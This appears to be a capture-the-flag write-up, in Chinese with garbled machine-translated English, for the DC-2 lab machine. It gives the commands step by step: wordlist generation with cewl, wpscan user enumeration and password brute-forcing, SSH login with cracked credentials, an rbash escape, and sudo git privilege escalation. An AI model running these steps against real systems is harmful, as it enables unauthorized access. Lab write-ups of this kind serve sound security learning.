Before hitting a target,Card for a long time in the right.
Will try basis, not to see what a little sudden ideas

准备

kail攻击机IP：192.168.178.151
dc-2 IP：未知

信息收集

nmap -sS 192.168.178.151/24

Target hostIP为192.168.178.152

nmap -sV -p- 192.168.178.152

先看http的
访问80端口,显示无法访问,说明 DNS 无法解析该域名

在 HOSTS 文件中添加dc-2即可访问

flag1

访问该IP地址发现是一个wordpress框架
点开flagModules are tips you need to usecewl工具（cewl是kali的一个工具,Can crawl through a site keyword set up password dictionary）

cewl dc-2 -w pwd.txt

Here at the same time suggests the need to log in to another account for the nextflag,所以可以用wpscan扫描指定Url,枚举其中的用户名,Then use down dictionary for blasting,To get the other user corresponding password

wpsan --url http://dc-2/ -e u

Will get the user name of the three enumeration to writeuser.txt文件中,下面就是使用wpscan来进行爆破（A little curioushydra行不行,有空再试试）

wpscan --url dc-2 user.txt -P pwd.txt

得到

uername:jerry password:adipiscing
username:tom password:parturient

The next step is to sweep the background and see where is the login screen

Login interface as：http://dc-2/wp-login.php
Or the direct backgroundhttp://dc-2/wp-admin/（wordpress框架）

flag2

登录jerry用户,成功找到flag2

flag3

根据Flags2的提示,Here may use to open7744端口
jerryThe user just used to,先试试tom(-p 7744指定ssh端口登录,默认端口是22端口)

ssh [email protected]-2 -p 7744

发现没有Cat权限,并且tomUsers are limitedrbash,这时候就需要进行rbash逃逸.

方法一

1)BASH_CMDS[a]=/bin/sh;a#把/bin/bash的值赋给a
2)/bin/bash#Performed on a command to leave the input
3)export PATH=$PATH:/bin/#把/bin作为PATH环境变量导出
4）export PATH=$PATH:/usr/bin/#将/usr/binAs the environment variable export

方法二

Don't use success,Field, such as success and again

flag4

切换到jerry用户
查找flag4.txt

Prompt the last oneflag和git

提权

First take a look at the current what permissions

sudo -l

发现可以用jerry用户git提权（git When can open the pages of the input command revbash）

sudo git help config
!/bin/bash

找到最后的flag

参考文章：
https://www.freebuf.com/articles/others-articles/339352.html